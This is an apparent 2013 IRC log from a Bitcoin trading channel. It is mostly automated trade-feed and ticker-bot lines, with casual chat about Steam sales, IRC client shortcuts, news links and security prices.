[DMS.PURCHASE] 10 @ 0.040033 = 0.4003 BTC [-] Jul 15 19:54:33 ;;estimate Jul 15 19:54:34 Next difficulty estimate | 29817618.1201 based on data since last change | 30294411.5435 based on data for last three days Jul 15 19:56:01 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00434 = 0.0434 BTC [-] Jul 15 19:58:19 [BTCTC] [BFMINES] 180 @ 0.003999 = 0.7198 BTC [+] Jul 15 19:58:25 [BTCTC] [AMC-PT] 24825 @ 0.0025 = 62.0625 BTC [+] Jul 15 19:59:14 ;;baratio Jul 15 19:59:16 Total bids: 12487661 USD. Total asks: 109846 BTC. Ratio: 113.68304 USD/BTC. | Data vintage: 0.0073 seconds Jul 15 20:01:58 [BTCTC] [PAJKA.BOND] 14 @ 0.052999 = 0.742 BTC [-] Jul 15 20:02:44 [BTCTC] [S.DICE-PT] 141 @ 0.002256 = 0.3181 BTC [-] Jul 15 20:02:46 [BTCTC] [S.DICE-PT] 3 @ 0.002255 = 0.0068 BTC [-] Jul 15 20:07:37 [MPEX] [S.MPOE] 4100 @ 0.00081341 = 3.335 BTC [-] Jul 15 20:07:53 [BTCTC] [DMS.MINING] 1 @ 0.016 BTC [-] Jul 15 20:08:43 [HAVELOCK] [HIM] 9 @ 0.263001 = 2.367 BTC [-] Jul 15 20:09:01 [HAVELOCK] [HIM] 1 @ 0.3 BTC [+] Jul 15 20:09:12 [HAVELOCK] [SDSTM] 10 @ 0.00999 = 0.0999 BTC [-] Jul 15 20:09:33 [HAVELOCK] [AM100] 2 @ 0.04055 = 0.0811 BTC [-] Jul 15 20:10:02 [HAVELOCK] [SDSTM] 3 @ 0.00999 = 0.03 BTC [-] Jul 15 20:10:09 [HAVELOCK] [AM100] 65 @ 0.04055 = 2.6358 BTC [-] Jul 15 20:10:25 [HAVELOCK] [AM100] 1 @ 0.04056 BTC [+] Jul 15 20:11:50 [BTCTC] [ASICMINER-PT] 1 @ 4.294999 BTC [-] Jul 15 20:14:39 Dammit Steam, taking all my money Jul 15 20:17:14 [BTCTC] [PAJKA.BOND] 10 @ 0.052999 = 0.53 BTC [-] Jul 15 20:18:58 [BTCTC] [DMS.SELLING] 31 @ 0.02496 = 0.7738 BTC [+] Jul 15 20:22:45 [BTCTC] [TAT.ASICMINER] 2 @ 0.042004 = 0.084 BTC [-] Jul 15 20:23:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.042004 BTC [-] Jul 15 20:24:23 Rulother: same... just wish i could deposit btc direct :) Jul 15 20:24:40 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jul 15 20:25:56 Rulother: how many games have you bought in the summer sale? Jul 15 20:26:29 ;;ticker Jul 15 20:26:30 MtGox BTCUSD ticker | Best bid: 98.00000, Best ask: 98.41022, Bid-ask spread: 0.41022, Last trade: 97.75000, 24 hour volume: 33166.97865970, 24 hour low: 92.86000, 24 hour high: 101.94000, 24 hour vwap: 98.13771 Jul 15 20:27:01 there is a sale? Jul 15 20:27:07 anything good? Jul 15 20:27:12 mircea_popescu: bitbet.us ad on jd doesn't show (bitbet.us); on purpose? Jul 15 20:27:48 it renders here Jul 15 20:27:52 you have adblock? Jul 15 20:28:24 hmm Jul 15 20:29:00 mircea_popescu: nevermind Jul 15 20:29:09 kakobreklaa: you were right Jul 15 20:29:32 lol, i never blocked bitbet Jul 15 20:29:36 Yeah the Steam Summer Sale, crazy % off new and old games. It's the best time to buy games really. Jul 15 20:29:51 I've purchased about 10 games so far Jul 15 20:30:55 yea same :) Jul 15 20:31:11 i bought a game to a friend also, want him to join in on mulitplayer Jul 15 20:31:20 hard to get friend to play wargame airbattle Jul 15 20:34:25 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.00434 = 0.0304 BTC [-] Jul 15 20:36:53 [HAVELOCK] [AM100] 1 @ 0.04 BTC [-] Jul 15 20:36:55 [HAVELOCK] [AM100] 1 @ 0.039805 BTC [-] Jul 15 20:36:56 [HAVELOCK] [AM100] 5 @ 0.03980111 = 0.199 BTC [-] Jul 15 20:36:57 [HAVELOCK] [AM100] 5 @ 0.03980101 = 0.199 BTC [-] Jul 15 20:36:58 [HAVELOCK] [AM100] 10 @ 0.03980101 = 0.398 BTC [-] Jul 15 20:37:00 [HAVELOCK] [AM100] 3 @ 0.0398 = 0.1194 BTC [-] Jul 15 20:37:01 [HAVELOCK] [AM100] 5 @ 0.0398 = 0.199 BTC [-] Jul 15 20:37:02 [HAVELOCK] [AM100] 12 @ 0.03971 = 0.4765 BTC [-] Jul 15 20:37:02 [HAVELOCK] [AM100] 119 @ 0.039701 = 4.7244 BTC [-] Jul 15 20:37:03 [HAVELOCK] [AM100] 44 @ 0.0397 = 1.7468 BTC [-] Jul 15 20:37:57 [BTCTC] [AMC-PT] 25 @ 0.0025 = 0.0625 BTC [+] Jul 15 20:38:38 [BTCTC] [TAT.ASICMINER] 44 @ 0.041391 = 1.8212 BTC [-] Jul 15 20:43:14 [BTCTC] [TAT.ASICMINER] 2 @ 0.042003 = 0.084 BTC [+] Jul 15 20:44:24 [BTCTC] [ASICMINER-PT] 1 @ 4.26 BTC [-] Jul 15 20:45:42 [BTCTC] [ASICMINER-PT] 1 @ 4.233001 BTC [-] Jul 15 20:46:45 I have been wanting to play the new bioshock and dishonored for a while, that plus Max Payne 3 Jul 15 20:55:12 [BTCTC] [B.YABMC] 1 @ 0.0035 BTC [+] Jul 15 20:55:47 [BTCTC] [DMS.MINING] 6 @ 0.0162 = 0.0972 BTC [+] Jul 15 20:55:49 [BTCTC] [DMS.MINING] 94 @ 0.0162 = 1.5228 BTC [+] Jul 15 20:57:46 [BTCTC] [AMC-PT] 5 @ 0.0025 = 0.0125 BTC [+] Jul 15 20:58:20 [BTCTC] [ASICMINER-PT] 1 @ 4.24197 BTC [+] Jul 15 20:58:22 [BTCTC] [ASICMINER-PT] 1 @ 4.24197 BTC [+] Jul 15 20:59:55 http://www.theverge.com/2013/7/15/4524484/negative-online-reviews-mit-study Jul 15 20:59:57 Love / hate: the biggest fans of products leave the harshest online reviews, says new study | The Ve Jul 15 21:00:35 haters gonna love? Jul 15 21:01:35 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00434 = 0.0087 BTC [-] Jul 15 21:02:12 lovers gonna hate Jul 15 21:03:45 ^ Jul 15 21:06:35 [BTCTC] [DMS.SELLING] 20 @ 0.02495 = 0.499 BTC [-] Jul 15 21:08:07 [HAVELOCK] [AM100] 11 @ 0.039701 = 0.4367 BTC [+] Jul 15 21:08:09 [HAVELOCK] [AM100] 89 @ 0.0397 = 3.5333 BTC [-] Jul 15 21:09:32 [BTCTC] [TAT.ASICMINER] 78 @ 0.041397 = 3.229 BTC [-] Jul 15 21:09:34 [BTCTC] [TAT.ASICMINER] 11 @ 0.041396 = 0.4554 BTC [-] Jul 15 21:11:03 http://www.wired.com/wiredenterprise/2013/07/iafcu/?cid=9803794 Jul 15 21:11:06 The Internet Archive Rescues Bitcoiners From Banking Oblivion | Wired Enterprise | Wired.com Jul 15 21:11:07 [BTCTC] [B.YABMC] 16 @ 0.0035 = 0.056 BTC [+] Jul 15 21:11:12 Internet Archive Credit Union? Jul 15 21:12:06 [BTCTC] [TAT.ASICMINER] 7 @ 0.041825 = 0.2928 BTC [+] Jul 15 21:12:46 [BTCTC] [TAT.ASICMINER] 4 @ 0.041819 = 0.1673 BTC [-] Jul 15 21:14:34 [BTCTC] [ASICMINER-PT] 7 @ 4.23333 = 29.6333 BTC [-] Jul 15 21:15:11 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 15 21:17:30 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jul 15 21:19:20 [BTCTC] [GSDPT] 100 @ 0.002295 = 0.2295 BTC [-] Jul 15 21:19:50 [MPEX] [S.MPOE] 12500 @ 0.00080706 = 10.0883 BTC [-] Jul 15 21:19:59 [BTCTC] [GSDPT] 193 @ 0.002296 = 0.4431 BTC [+] Jul 15 21:20:11 [HAVELOCK] [SDSTM] 1 @ 0.0095 BTC [-] Jul 15 21:20:15 [BTCTC] [TAT.ASICMINER] 11 @ 0.041818 = 0.46 BTC [-] Jul 15 21:21:27 [BTCTC] [COGNITIVE] 1 @ 0.589999 BTC [+] Jul 15 21:21:29 [BTCTC] [COGNITIVE] 13 @ 0.589999 = 7.67 BTC [+] Jul 15 21:22:38 [BTCTC] [S.MPOE-PT] 2 @ 0.000922 = 0.0018 BTC [+] Jul 15 21:23:21 [BTCTC] [COGNITIVE] 14 @ 0.59 = 8.26 BTC [+] Jul 15 21:25:53 [BTCTC] [COGNITIVE] 6 @ 0.599 = 3.594 BTC [+] Jul 15 21:27:43 [BTCTC] [DMS.MINING] 1 @ 0.0162 BTC [+] Jul 15 21:32:51 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [+] Jul 15 21:33:13 [BTCTC] [TAT.ASICMINER] 16 @ 0.041819 = 0.6691 BTC [+] Jul 15 21:33:53 kakobreklaa: they were selling some newer games for 50-75% off Jul 15 21:33:55 like remember me Jul 15 21:34:23 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [+] Jul 15 21:34:31 Hell, I got Dishonored for $10 Jul 15 21:34:47 Oh wow? Jul 15 21:34:49 Really? Jul 15 21:34:55 is that still on sale? Jul 15 21:34:56 yeah it's still going on Jul 15 21:35:07 I might pick that up. Jul 15 21:35:15 Every 24hrs new set of sales, and every 7hrs new set of Flash sales Jul 15 21:35:20 I wish steam took bitcoin as you said. Jul 15 21:35:55 agrred Jul 15 21:35:59 agreed* Jul 15 21:39:38 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 15 21:42:22 [HAVELOCK] [AM100] 6 @ 0.040001 = 0.24 BTC [+] Jul 15 21:42:32 [HAVELOCK] [AM100] 196 @ 0.04 = 7.84 BTC [-] Jul 15 21:42:48 window 16 Jul 15 21:42:54 oops Jul 15 21:43:56 [BTCTC] [ASICMINER-PT] 1 @ 4.289999 BTC [+] Jul 15 21:44:57 [BTCTC] [COGNITIVE] 2 @ 0.598999 = 1.198 BTC [-] Jul 15 21:45:04 [BTCTC] [TAT.ASICMINER] 17 @ 0.041819 = 0.7109 BTC [+] Jul 15 21:46:40 aha, irssi :) Jul 15 21:47:34 Nice observation! Jul 15 21:47:38 You using irssi as well? Jul 15 21:49:55 [BTCTC] [AMC-PT] 150 @ 0.0025 = 0.375 BTC [+] Jul 15 21:54:18 sure Jul 15 21:55:13 [HAVELOCK] [AM100] 200 @ 0.040608 = 8.1216 BTC [+] Jul 15 21:55:51 thestringpuller: 16 can still be reached with alt+y, but need that often for my > 90 windows Jul 15 21:56:04 [HAVELOCK] [AM100] 20 @ 0.040608 = 0.8122 BTC [+] Jul 15 21:56:37 [HAVELOCK] [AM100] 20 @ 0.040608 = 0.8122 BTC [+] Jul 15 21:56:51 [HAVELOCK] [AM100] 3 @ 0.040608 = 0.1218 BTC [+] Jul 15 21:59:14 Satoshi Square today Jul 15 21:59:18 welcome all Jul 15 22:00:24 [BTCTC] [AMC-PT] 145 @ 0.0025 = 0.3625 BTC [+] Jul 15 22:02:42 [HAVELOCK] [SDSTM] 1 @ 0.00999 BTC [+] Jul 15 22:02:59 [HAVELOCK] [SDSTM] 1 @ 0.00999 BTC [+] Jul 15 22:04:37 FabianB_: I guess you don't use alt+arrow-key very often XD Jul 15 22:05:07 thestringpuller: rarely Jul 15 22:07:15 [BTCTC] [COGNITIVE] 5 @ 0.59996 = 2.9998 BTC [+] Jul 15 22:07:44 [BTCTC] [COGNITIVE] 1 @ 0.599999 BTC [+] Jul 15 22:09:41 [BTCTC] [GSDPT] 7 @ 0.002296 = 0.0161 BTC [+] Jul 15 22:15:26 [BTCTC] [ASICMINER-PT] 1 @ 4.289999 BTC [+] Jul 15 22:15:39 [BTCTC] [AMC-PT] 4000 @ 0.0025 = 10 BTC [+] Jul 15 22:20:12 [BTCTC] [S.DICE-PT] 51 @ 0.002192 = 0.1118 BTC [-] Jul 15 22:20:25 [BTCTC] [S.DICE-PT] 10 @ 0.002176 = 0.0218 BTC [-] Jul 15 22:20:27 [BTCTC] [S.DICE-PT] 5 @ 0.002172 = 0.0109 BTC [-] Jul 15 22:20:28 [BTCTC] [S.DICE-PT] 255 @ 0.002151 = 0.5485 BTC [-] Jul 15 22:20:30 [BTCTC] [S.DICE-PT] 51 @ 0.002092 = 0.1067 BTC [-] Jul 15 22:20:31 [BTCTC] [BITVPS] 58 @ 0.001653 = 0.0959 BTC [-] Jul 15 22:20:32 [BTCTC] [S.DICE-PT] 350 @ 0.002072 = 0.7252 BTC [-] Jul 15 22:20:34 [BTCTC] [S.DICE-PT] 361 @ 0.002068 = 0.7465 BTC [-] Jul 15 22:20:35 [BTCTC] [S.DICE-PT] 100 @ 0.00205 = 0.205 BTC [-] Jul 15 22:20:36 [BTCTC] [S.DICE-PT] 200 @ 0.00205 = 0.41 BTC [-] Jul 15 22:20:37 [BTCTC] [S.DICE-PT] 200 @ 0.002005 = 0.401 BTC [-] Jul 15 22:20:38 [BTCTC] [S.DICE-PT] 150 @ 0.002002 = 0.3003 BTC [-] Jul 15 22:20:40 [BTCTC] [S.DICE-PT] 1000 @ 0.002002 = 2.002 BTC [-] Jul 15 22:20:41 [BTCTC] [S.DICE-PT] 1000 @ 0.002001 = 2.001 BTC [-] Jul 15 22:20:42 [BTCTC] [S.DICE-PT] 2751 @ 0.002 = 5.502 BTC [-] Jul 15 22:21:15 [BTCTC] [S.BBET-PT] 1 @ 0.001511 BTC [-] Jul 15 22:22:32 [BTCTC] [S.BBET-PT] 8 @ 0.00151 = 0.0121 BTC [-] Jul 15 22:25:35 [BTCTC] [AMC-PT] 45 @ 0.0025 = 0.1125 BTC [+] Jul 15 22:32:01 [HAVELOCK] [VTX] 1 @ 0.79998 BTC [+] Jul 15 22:32:32 [MPEX] [S.MPOE] 6000 @ 0.00080534 = 4.832 BTC [-] Jul 15 22:32:34 [MPEX] [S.MPOE] 4900 @ 0.00081013 = 3.9696 BTC [+] Jul 15 22:32:38 [BTCTC] [BASIC-MINING] 3 @ 0.659999 = 1.98 BTC [+] Jul 15 22:33:01 [BTCTC] [BASIC-MINING] 1 @ 0.66 BTC [+] Jul 15 22:33:02 [BTCTC] [BASIC-MINING] 2 @ 0.66 = 1.32 BTC [+] Jul 15 22:33:27 [BTCTC] [BASIC-MINING] 1 @ 0.668679 BTC [+] Jul 15 22:33:30 go on Jul 15 22:33:42 [BTCTC] [BASIC-MINING] 2 @ 0.668679 = 1.3374 BTC [+] Jul 15 22:34:12 [BTCTC] [BASIC-MINING] 1 @ 0.66868 BTC [+] Jul 15 22:34:14 [BTCTC] [BASIC-MINING] 1 @ 0.66868 BTC [+] Jul 15 22:34:39 [BTCTC] [BASIC-MINING] 1 @ 0.6687 BTC [+] Jul 15 22:35:10 hi all Jul 15 22:35:15 [BTCTC] [BASIC-MINING] 3 @ 0.668679 = 2.006 BTC [-] Jul 15 22:35:48 [BTCTC] [BASIC-MINING] 2 @ 0.6689 = 1.3378 BTC [+] Jul 15 22:36:56 [BTCTC] [BITVPS] 23 @ 0.001655 = 0.0381 BTC [+] Jul 15 22:37:27 [BTCTC] [BASIC-MINING] 1 @ 0.668999 BTC [+] Jul 15 22:37:44 [BTCTC] [BASIC-MINING] 1 @ 0.669 BTC [+] Jul 15 22:38:06 [BTCTC] [BASIC-MINING] 1 @ 0.669 BTC [+] Jul 15 22:38:57 [BTCTC] [DMS.PURCHASE] 1 @ 0.040033 BTC [-] Jul 15 22:39:10 so...satoshi square today Jul 15 22:39:12 [BTCTC] [TAT.ASICMINER] 2 @ 0.04182 = 0.0836 BTC [+] Jul 15 22:39:14 [BTCTC] [TAT.ASICMINER] 14 @ 0.042003 = 0.588 BTC [+] Jul 15 22:39:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.042004 BTC [+] Jul 15 22:39:18 [BTCTC] [TAT.ASICMINER] 27 @ 0.042005 = 1.1341 BTC [+] Jul 15 22:39:20 [BTCTC] [TAT.ASICMINER] 28 @ 0.042066 = 1.1778 BTC [+] Jul 15 22:39:21 [BTCTC] [TAT.ASICMINER] 4 @ 0.042067 = 0.1683 BTC [+] Jul 15 22:39:23 [BTCTC] [TAT.ASICMINER] 18 @ 0.042095 = 0.7577 BTC [+] Jul 15 22:40:23 [BTCTC] [DMS.SELLING] 1 @ 0.02495 BTC [-] Jul 15 22:40:24 [BTCTC] [BASIC-MINING] 1 @ 0.67 BTC [+] Jul 15 22:40:46 [BTCTC] [AMC-PT] 23 @ 0.002491 = 0.0573 BTC [-] Jul 15 22:40:55 [BTCTC] [BASIC-MINING] 1 @ 0.674999 BTC [+] Jul 15 22:41:28 [BTCTC] [AMC-PT] 2 @ 0.002491 = 0.005 BTC [-] Jul 15 22:41:54 [BTCTC] [BFMINES] 6 @ 0.003231 = 0.0194 BTC [-] Jul 15 22:42:51 [BTCTC] [BFMINES] 5 @ 0.003999 = 0.02 BTC [+] Jul 15 22:50:37 [BTCTC] [TAT.VIRTUALMINE] 47 @ 0.00434 = 0.204 BTC [-] Jul 15 22:50:41 [BTCTC] [BASIC-MINING] 10 @ 0.5 = 5 BTC [-] Jul 15 22:52:57 [BTCTC] [BASIC-MINING] 4 @ 0.67 = 2.68 BTC [+] Jul 15 22:54:12 [HAVELOCK] [SDSTM] 10 @ 0.00999 = 0.0999 BTC [+] Jul 15 22:57:29 [BTCTC] [DMS.SELLING] 8 @ 0.0241 = 0.1928 BTC [-] Jul 15 22:58:10 i need basic to get back to .8 today Jul 15 22:58:16 then I will be happy Jul 15 22:58:18 and only then Jul 15 22:58:31 [BTCTC] [DMS.PURCHASE] 4 @ 0.0377 = 0.1508 BTC [-] Jul 15 22:59:47 [HAVELOCK] [VTX] 1 @ 0.79998 BTC [+] Jul 15 22:59:49 [HAVELOCK] [VTX] 15 @ 0.799998 = 12 BTC [+] Jul 15 23:00:52 [BTCTC] [ASICMINER-PT] 1 @ 4.29 BTC [+] Jul 15 23:00:57 [BTCTC] [ASICMINER-PT] 1 @ 4.291998 BTC [+] Jul 15 23:01:15 [BTCTC] [ASICMINER-PT] 1 @ 4.296 BTC [+] Jul 15 23:03:23 [BTCTC] [COGNITIVE] 5 @ 0.599999 = 3 BTC [+] Jul 15 23:03:53 [BTCTC] [CRYPTO-TRADE] 1 @ 0.195 BTC [-] Jul 15 23:04:09 0.8 seems to far for today, rulother Jul 15 23:04:38 but the next good news.. and there is no problem Jul 15 23:05:31 [BTCTC] [ASICMINER-PT] 1 @ 4.299999 BTC [+] Jul 15 23:05:36 [HAVELOCK] [SDSTM] 4 @ 0.00999 = 0.04 BTC [+] Jul 15 23:06:30 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [+] Jul 15 23:13:11 [BTCTC] [AMC-PT] 4 @ 0.0025 = 0.01 BTC [+] Jul 15 23:17:06 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00434 BTC [-] Jul 15 23:18:08 [HAVELOCK] [SDSTM] 31 @ 0.00999 = 0.3097 BTC [+] Jul 15 23:20:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.042094 BTC [-] Jul 15 23:20:24 [BTCTC] [TAT.ASICMINER] 10 @ 0.042094 = 0.4209 BTC [-] Jul 15 23:20:31 Yeah maybe not .8 today, but as long as it keeps this pace of going back up... I'll be happy Jul 15 23:21:25 me too.. i have some more bids down to .55, but ... doesn't feel good Jul 15 23:21:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.041819 BTC [-] Jul 15 23:22:16 [BTCTC] [TAT.ASICMINER] 4 @ 0.041601 = 0.1664 BTC [-] Jul 15 23:23:04 [BTCTC] [TAT.ASICMINER] 8 @ 0.0416 = 0.3328 BTC [-] Jul 15 23:23:46 [BTCTC] [TAT.ASICMINER] 3 @ 0.041554 = 0.1247 BTC [-] Jul 15 23:24:34 [BTCTC] [TAT.ASICMINER] 3 @ 0.041554 = 0.1247 BTC [-] Jul 15 23:24:36 [BTCTC] [TAT.ASICMINER] 3 @ 0.041553 = 0.1247 BTC [-] Jul 15 23:26:56 [BTCTC] [TAT.ASICMINER] 3 @ 0.041554 = 0.1247 BTC [+] Jul 15 23:28:01 [BTCTC] [TAT.ASICMINER] 27 @ 0.041555 = 1.122 BTC [+] Jul 15 23:30:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.041554 BTC [-] Jul 15 23:30:02 [BTCTC] [TAT.ASICMINER] 7 @ 0.041554 = 0.2909 BTC [-] Jul 15 23:31:14 jurov: are you around? Jul 15 23:31:23 yes? Jul 15 23:31:44 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.00425 = 0.85 BTC [-] Jul 15 23:31:50 i'll msg you Jul 15 23:33:51 [BTCTC] [DMS.PURCHASE] 22 @ 0.040033 = 0.8807 BTC [+] Jul 15 23:35:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.041557 BTC [+] Jul 15 23:35:36 [BTCTC] [B.YABMC] 2 @ 0.0035 = 0.007 BTC [+] Jul 15 23:36:40 [BTCTC] [AMC-PT] 15 @ 0.0025 = 0.0375 BTC [+] Jul 15 23:41:14 ;;ticker Jul 15 23:41:16 MtGox BTCUSD ticker | Best bid: 99.00000, Best ask: 99.00490, Bid-ask spread: 0.00490, Last trade: 99.00000, 24 hour volume: 36053.91377372, 24 hour low: 92.86000, 24 hour high: 101.94000, 24 hour vwap: 98.29262 Jul 15 23:46:26 [BTCTC] [BTC-BOND] 3 @ 0.009996 = 0.03 BTC [+] Jul 15 23:50:13 [MPEX] [S.MPOE] 2436 @ 0.00081341 = 1.9815 BTC [+] Jul 15 23:50:15 [MPEX] [S.MPOE] 36702 @ 0.00081567 = 29.9367 BTC [+] Jul 15 23:52:43 [MPEX] [S.MPOE] 8838 @ 0.00081567 = 7.2089 BTC [+] Jul 15 23:53:48 [BTCTC] [BTC-BOND] 13 @ 0.009996 = 0.1299 BTC [+] Jul 16 00:00:34 [BTCTC] [BASIC-MINING] 5 @ 0.674989 = 3.3749 BTC [+] Jul 16 00:00:51 [BTCTC] [BASIC-MINING] 1 @ 0.67499 BTC [+] Jul 16 00:01:39 good afternoon :D Jul 16 00:03:03 [BTCTC] [BASIC-MINING] 3 @ 0.621001 = 1.863 BTC [-] Jul 16 00:03:19 breeezzz: good night :D Jul 16 00:03:29 [BTCTC] [COGNITIVE] 4 @ 0.599999 = 2.4 BTC [+] Jul 16 00:03:37 heh :> Jul 16 00:04:19 [BTCTC] [DMS.MINING] 2 @ 0.0162 = 0.0324 BTC [+] Jul 16 00:07:46 omg just looking on page 1 of Recent Unread Topics: Krugercoin,Hypercoin,Nuggets,PhenixCoin,Doubloons Jul 16 00:08:08 hilarity Jul 16 00:08:28 lol, every minute a new altcoin? Jul 16 00:08:34 ;;ticker Jul 16 00:08:36 MtGox BTCUSD ticker | Best bid: 99.00000, Best ask: 99.50500, Bid-ask spread: 0.50500, Last trade: 99.51499, 24 hour volume: 36112.01800067, 24 hour low: 92.86000, 24 hour high: 101.94000, 24 hour vwap: 98.29431 Jul 16 00:10:45 [HAVELOCK] [SDSTM] 10 @ 0.009999 = 0.1 BTC [+] Jul 16 00:20:37 [BTCTC] [ASICMINER-PT] 1 @ 4.301111 BTC [+] Jul 16 00:20:39 [BTCTC] [DMS.MINING] 2 @ 0.0162 = 0.0324 BTC [+] Jul 16 00:20:56 [BTCTC] [AMC-PT] 9 @ 0.0025 = 0.0225 BTC [+] Jul 16 00:21:57 [BTCTC] [BASIC-MINING] 3 @ 0.674998 = 2.025 BTC [+] Jul 16 00:22:15 [BTCTC] [AMC-PT] 80 @ 0.0025 = 0.2 BTC [+] Jul 16 00:22:45 [BTCTC] [TAT.ASICMINER] 13 @ 0.042045 = 0.5466 BTC [+] Jul 16 00:22:47 [BTCTC] [TAT.ASICMINER] 7 @ 0.042046 = 0.2943 BTC [+] Jul 16 00:22:49 [BTCTC] [TAT.ASICMINER] 20 @ 0.04205 = 0.841 BTC [+] Jul 16 00:23:40 [BTCTC] [TAT.ASICMINER] 50 @ 0.042092 = 2.1046 BTC [+] Jul 16 00:25:20 [BTCTC] [ASICMINER-PT] 1 @ 4.31 BTC [+] Jul 16 00:25:29 [BTCTC] [ASICMINER-PT] 2 @ 4.315 = 8.63 BTC [+] Jul 16 00:25:31 [BTCTC] [ASICMINER-PT] 2 @ 4.319995 = 8.64 BTC [+] Jul 16 00:26:49 [BTCTC] [BASIC-MINING] 1 @ 0.674999 BTC [+] Jul 16 00:27:16 [BTCTC] [COGNITIVE] 1 @ 0.580001 BTC [-] Jul 16 00:28:15 [BTCTC] [DMS.SELLING] 92 @ 0.0241 = 2.2172 BTC [-] Jul 16 00:28:39 [BTCTC] [ASICMINER-PT] 2 @ 4.3 = 8.6 BTC [-] Jul 16 00:33:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.042092 BTC [+] Jul 16 00:37:57 [BTCTC] [ASICMINER-PT] 1 @ 4.32 BTC [+] Jul 16 00:37:58 [BTCTC] [ASICMINER-PT] 1 @ 4.328995 BTC [+] Jul 16 00:39:57 [BTCTC] [TAT.ASICMINER] 4 @ 0.042092 = 0.1684 BTC [+] Jul 16 00:39:59 [BTCTC] [TAT.ASICMINER] 56 @ 0.042093 = 2.3572 BTC [+] Jul 16 00:45:02 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00433 BTC [+] Jul 16 00:45:04 [BTCTC] [TAT.VIRTUALMINE] 109 @ 0.00434 = 0.4731 BTC [+] Jul 16 00:45:39 [BTCTC] [COGNITIVE] 1 @ 0.570001 BTC [-] Jul 16 00:46:15 [BTCTC] [COGNITIVE] 1 @ 0.57 BTC [-] Jul 16 00:50:28 SDSTM is going up :D Jul 16 00:52:31 [BTCTC] [TAT.ASICMINER] 45 @ 0.042093 = 1.8942 BTC [+] Jul 16 00:53:03 [BTCTC] [COGNITIVE] 1 @ 0.599999 BTC [+] Jul 16 00:54:33 [BTCTC] [COGNITIVE] 1 @ 0.6 BTC [+] Jul 16 01:04:41 [BTCTC] [AMC-PT] 1500 @ 0.0025 = 3.75 BTC [+] Jul 16 01:06:42 [BTCTC] [DMS.SELLING] 4 @ 0.02489 = 0.0996 BTC [+] Jul 16 01:06:45 [BTCTC] [DMS.MINING] 1 @ 0.0162 BTC [+] Jul 16 01:08:53 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 16 01:11:13 [BTCTC] [COGNITIVE] 1 @ 0.599999 BTC [-] Jul 16 01:13:37 [BTCTC] [COGNITIVE] 4 @ 0.6 = 2.4 BTC [+] Jul 16 01:13:38 [BTCTC] [COGNITIVE] 5 @ 0.6 = 3 BTC [+] Jul 16 01:13:42 [BTCTC] [COGNITIVE] 6 @ 0.6 = 3.6 BTC [+] Jul 16 01:14:36 [BTCTC] [DMS.MINING] 2 @ 0.0162 = 0.0324 BTC [+] Jul 16 01:17:41 [BTCTC] [PAJKA.BOND] 2 @ 0.052 = 0.104 BTC [-] Jul 16 01:19:06 [BTCTC] [COGNITIVE] 10 @ 0.6 = 6 BTC [+] Jul 16 01:19:08 [BTCTC] [COGNITIVE] 1 @ 0.6 BTC [+] Jul 16 01:19:11 [BTCTC] [COGNITIVE] 1 @ 0.6 BTC [+] Jul 16 01:19:13 [BTCTC] [COGNITIVE] 5 @ 0.6 = 3 BTC [+] Jul 16 01:19:15 [BTCTC] [COGNITIVE] 1 @ 0.6089 BTC [+] Jul 16 01:19:15 [BTCTC] [COGNITIVE] 2 @ 0.609965 = 1.2199 BTC [+] Jul 16 01:19:17 [BTCTC] [COGNITIVE] 1 @ 0.609966 BTC [+] Jul 16 01:19:18 [BTCTC] [COGNITIVE] 5 @ 0.60997 = 3.0499 BTC [+] Jul 16 01:19:19 [BTCTC] [COGNITIVE] 6 @ 0.609987 = 3.6599 BTC [+] Jul 16 01:19:22 [BTCTC] [COGNITIVE] 14 @ 0.609988 = 8.5398 BTC [+] Jul 16 01:19:35 [BTCTC] [COGNITIVE] 29 @ 0.60999 = 17.6897 BTC [+] Jul 16 01:20:36 [BTCTC] [AMC-PT] 330 @ 0.0025 = 0.825 BTC [+] Jul 16 01:21:45 [BTCTC] [TAT.ASICMINER] 69 @ 0.041605 = 2.8707 BTC [-] Jul 16 01:21:47 [BTCTC] [TAT.ASICMINER] 50 @ 0.041604 = 2.0802 BTC [-] Jul 16 01:21:49 [BTCTC] [TAT.ASICMINER] 2 @ 0.041602 = 0.0832 BTC [-] Jul 16 01:21:51 [BTCTC] [TAT.ASICMINER] 86 @ 0.041594 = 3.5771 BTC [-] Jul 16 01:21:52 [BTCTC] [TAT.ASICMINER] 109 @ 0.041581 = 4.5323 BTC [-] Jul 16 01:21:54 [BTCTC] [TAT.ASICMINER] 20 @ 0.04158 = 0.8316 BTC [-] Jul 16 01:21:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.04156 = 0.0831 BTC [-] Jul 16 01:21:57 [BTCTC] [TAT.ASICMINER] 162 @ 0.041556 = 6.7321 BTC [-] Jul 16 01:23:50 [BTCTC] [AMC-PT] 8400 @ 0.0025 = 21 BTC [+] Jul 16 01:24:40 [BTCTC] [DMS.MINING] 4 @ 0.0162 = 0.0648 BTC [+] Jul 16 01:24:51 [BTCTC] [TAT.ASICMINER] 6 @ 0.042091 = 0.2525 BTC [+] Jul 16 01:27:06 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.00434 = 0.013 BTC [+] Jul 16 01:29:21 [HAVELOCK] [SDSTM] 20 @ 0.009999 = 0.2 BTC [+] Jul 16 01:31:38 [BTCTC] [DMS.MINING] 54 @ 0.0162 = 0.8748 BTC [+] Jul 16 01:31:41 [BTCTC] [DMS.MINING] 45 